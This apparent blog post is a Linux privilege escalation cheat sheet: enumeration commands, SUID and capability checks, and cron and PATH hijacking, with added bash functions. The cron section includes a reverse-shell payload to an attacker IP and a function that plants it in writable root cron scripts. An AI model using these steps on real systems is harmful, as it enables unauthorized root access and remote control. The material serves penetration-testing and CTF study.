Simple Linux Privilege Escalation Cheat Sheet

Omer Gunesacar
2 min read · Mar 11, 2023


These commands help us enumerate the Linux machine:

  1. hostname
  2. cat /proc/version
  3. cat /etc/issue
  4. uname -a
  5. ps aux (all processes, including the ones running as root)
  6. env
  7. sudo -l
  8. cat /etc/passwd and /etc/shadow (/etc/shadow is normally readable only by root; if we can read it, that is already a finding)
  9. history
  10. ifconfig, or ip a s (ip address show) on systems without net-tools
  11. netstat -tulpn, or ss -tulpn
  12. getcap -r / 2>/dev/null
  13. cat /etc/crontab (also check /etc/cron.d/ and /var/spool/cron/)

find /home -name flag1.txt: find files named "flag1.txt" under the /home directory

find / -type f -perm 0777 2>/dev/null: find files whose permissions are exactly 777 (use -perm -0002 to catch every world-writable file, including 666 ones)

find / -type f -mtime -10 2>/dev/null: find files modified in the last 10 days (-mtime 10 without the minus sign means modified exactly 10 days ago)

find / -writable 2>/dev/null: files and directories writable by the current user (add -type d to list only directories)

Automated Enumeration Tools:

  1. LinPEAS
  2. LinEnum
  3. Linux Smart Enumeration (lse)

Kernel Exploit

The kernel exploit methodology:

  1. Find the kernel version (uname -a, cat /proc/version).
  2. Search for a public exploit matching that kernel version (searchsploit or Exploit-DB), and check that it fits the distribution and architecture, not just the version number.
  3. Compile and execute the exploit on the target. Keep in mind that a kernel exploit that fails can crash the machine, so try everything else first.

Sudo

  1. Look for applications we are allowed to run as root (sudo -l); entries marked NOPASSWD need no password at all.
  2. Look up each binary at https://gtfobins.github.io/ for a way to spawn a shell or read/write files from it.

SUID

  1. "find / -type f -perm -4000 -ls 2>/dev/null" lists files with the SUID bit set; the SGID bit is 2000, so use -perm -2000 for SGID or -perm /6000 for either.
  2. Look up each binary on GTFOBins.
  3. Example: if nano has the SUID bit set, "nano /etc/shadow" opens /etc/shadow with root's permissions, so we can read the password hashes (and even edit them).

Capabilities

  1. We can use the "getcap" tool to list binaries with capabilities set → getcap -r / 2>/dev/null
  2. Look the binary and capability up on GTFOBins (for example, cap_setuid on an interpreter like python lets it call setuid(0) and spawn a root shell).
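The find-based checks above, the SUID/SGID search and the capability listing, packaged as bash functions. This is an added example, not code from the original post. Each function takes a root directory so it can be pointed at / on a target or at a scratch directory to try it out; it assumes GNU find (for -perm /mode and -writable), and the capability names in interesting_caps are my own selection of the ones GTFOBins covers, not an exhaustive list.

```shell
#!/bin/bash
# Added example, not code from the original post. Assumes GNU find.

# SUID binaries. -perm -4000 means "the setuid bit is set" (other bits may be set too).
find_suid() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# SGID binaries. The setgid bit is 2000, so a -4000 search does not find these.
find_sgid() {
    find "$1" -type f -perm -2000 2>/dev/null
}

# Either bit: -perm /6000 matches files with setuid OR setgid set (GNU syntax).
find_suid_or_sgid() {
    find "$1" -type f -perm /6000 2>/dev/null
}

# Files modified in the last N days. "-mtime N" alone means exactly N days ago;
# the leading minus turns it into "less than N days ago".
find_recent() {
    find "$1" -type f -mtime "-$2" 2>/dev/null
}

# World-writable files. -perm -0002 tests the "other write" bit alone, so it
# also catches 0666 files that an exact "-perm 0777" search would miss.
find_world_writable() {
    find "$1" -type f -perm -0002 2>/dev/null
}

# Directories the current user can write to (-writable checks our own access,
# not just the mode bits, so group-writable directories we belong to count).
find_writable_dirs() {
    find "$1" -type d -writable 2>/dev/null
}

# Filter "getcap -r /" output (on stdin) for capabilities that commonly lead to
# root. The list is my own selection; check GTFOBins for the exact binary.
interesting_caps() {
    grep -E 'cap_(setuid|setgid|dac_override|dac_read_search|sys_admin|sys_ptrace|sys_module)' || true
}

# Print a short report for one root directory (default /).
enumerate() {
    root="${1:-/}"
    echo "[*] SUID:";               find_suid "$root"
    echo "[*] SGID:";               find_sgid "$root"
    echo "[*] modified <10 days:";  find_recent "$root" 10
    echo "[*] world-writable:";     find_world_writable "$root"
    echo "[*] writable dirs:";      find_writable_dirs "$root"
    echo "[*] capabilities:"
    if command -v getcap >/dev/null 2>&1; then
        getcap -r "$root" 2>/dev/null | interesting_caps
    fi
    return 0
}
```

Source the file and run `enumerate /` on the target, or `enumerate /some/dir` to see what it reports on a directory you control; a saved `getcap -r /` listing can be piped through `interesting_caps` on its own.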

Cron Jobs

  1. Our goal is to find a cron job that runs as root and whose script (or the directory it lives in) is writable by us, then change that script to give us a shell.
  2. Ex: if some python or shell script is run by a root cron job and we can write to it, we can edit that file to get a root shell.
  3. #!/bin/bash
    bash -i >& /dev/tcp/<IP of attacker>/<port to listen on> 0>&1 (start a listener on the attacker machine first, e.g. nc -lvnp <port>, then wait for the next scheduled run)
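A check for cron entries whose script we can overwrite, together with the payload from step 3 written out correctly. This is an added example, not code from the original post. It parses the system crontab format (minute hour day month weekday user command, as used by /etc/crontab and /etc/cron.d/*); the attacker IP, port and any sample crontab are placeholders or constructed for the demonstration.

```shell
#!/bin/bash
# Added example, not code from the original post.

# Print "user<TAB>path" for every absolute path in a system crontab entry that
# the current user can write to. $1 is the crontab file (default /etc/crontab).
writable_cron_scripts() {
    crontab_file="${1:-/etc/crontab}"
    # Skip comments, blank lines and variable assignments (SHELL=..., PATH=...).
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$crontab_file" |
    while read -r _min _hour _dom _mon _dow user cmd; do
        # Every absolute path in the command field is a candidate: the
        # interpreter (/usr/bin/python3) as well as the script it runs.
        printf '%s\n' "$cmd" | grep -oE '(^|[[:space:]])/[^[:space:]]+' | tr -d ' \t' |
        while read -r script; do
            if [ -w "$script" ]; then
                printf '%s\t%s\n' "$user" "$script"
            fi
        done
    done
    return 0
}

# Overwrite a writable cron script with a bash reverse shell. The next run
# executes as the entry's user (root, if that is what the crontab says) and
# connects back to the listener on <attacker_ip>:<attacker_port>.
plant_reverse_shell() {
    script="$1"; attacker_ip="$2"; attacker_port="$3"
    cat > "$script" <<EOF
#!/bin/bash
bash -i >& /dev/tcp/$attacker_ip/$attacker_port 0>&1
EOF
    chmod +x "$script"
}
```

Run `writable_cron_scripts` (and again with each file under /etc/cron.d/) on the target; for every hit whose user column is root, start `nc -lvnp <port>` on the attacker machine and call `plant_reverse_shell <path> <attacker ip> <port>`. Entries using @reboot-style shortcuts are not parsed by this simple version, so read those by hand.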

PATH

  1. Let's look at which folders are in $PATH → echo $PATH
  2. Do we have permission to write to any of those folders? → find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u
  3. Let's say we can write to /tmp, and the target program (a SUID binary, a sudo entry or a root cron script) calls some command by its bare name instead of a full path. → export PATH=/tmp:$PATH
  4. Let's create a file in /tmp with the same name as that command, containing a root shell → echo "/bin/bash" > /tmp/<command name>
  5. Make that file readable, writable and executable for all users → chmod 777 /tmp/<command name> (755 is enough and stops other users from tampering with it)
  6. If user1 executes the target program, we get user1's shell. If root executes it, we get a root shell. Note that the exported PATH only affects processes we start, so this works directly against a SUID binary we run ourselves; cron and sudo use their own PATH, and the hijack only lands if that PATH contains our writable folder.
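The PATH hijack from steps 1 to 6 carried out end to end in a scratch directory. This is an added example, not code from the original post. On a real target the victim would be a SUID binary, a sudo entry or a root cron script that calls a command by bare name; here the "victim" is a constructed script we create ourselves, so the whole thing runs as an unprivileged user, and the payload is a marker echo instead of the cheat sheet's "/bin/bash".

```shell
#!/bin/bash
# Added example, not code from the original post.

# Step 2 done properly: directories in the current $PATH that we can write to.
writable_path_dirs() {
    printf '%s\n' "$PATH" | tr ':' '\n' |
    while read -r dir; do
        if [ -n "$dir" ] && [ -d "$dir" ] && [ -w "$dir" ]; then
            printf '%s\n' "$dir"
        fi
    done
    return 0
}

# Steps 4 and 5: drop a fake binary named after the command the victim calls
# into a writable directory. On a real target the payload would be "/bin/bash".
plant_fake_binary() {
    dir="$1"; name="$2"; payload="$3"
    printf '#!/bin/bash\n%s\n' "$payload" > "$dir/$name"
    chmod 755 "$dir/$name"   # 755 is enough; 777 lets anyone else tamper with it too
}

# Steps 3 and 6: run the victim with the writable directory first in PATH.
# Whoever runs the victim (root via cron, sudo or SUID on a real target)
# executes our file instead of the real command.
run_victim() {
    dir="$1"; victim="$2"
    PATH="$dir:$PATH" bash "$victim"
}

# Self-contained demo: a constructed "maintenance" script that calls ls without
# a full path, hijacked by a fake ls that reports which user ran it.
demo() {
    work=$(mktemp -d)
    mkdir "$work/bin"
    printf '#!/bin/bash\nls /\n' > "$work/victim.sh"
    plant_fake_binary "$work/bin" ls 'echo hijacked-as-$(id -un)'
    run_victim "$work/bin" "$work/victim.sh"
    rm -rf "$work"
}
```

Source the file and call `demo`: it prints `hijacked-as-<your user>` instead of a directory listing. To see why step 6 depends on who runs the program, run `sudo -u <other user> bash -c '. ./path_hijack.sh; demo'` on a box where you have that right; the marker then names the other user, because the fake binary runs with the victim's privileges, not ours.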
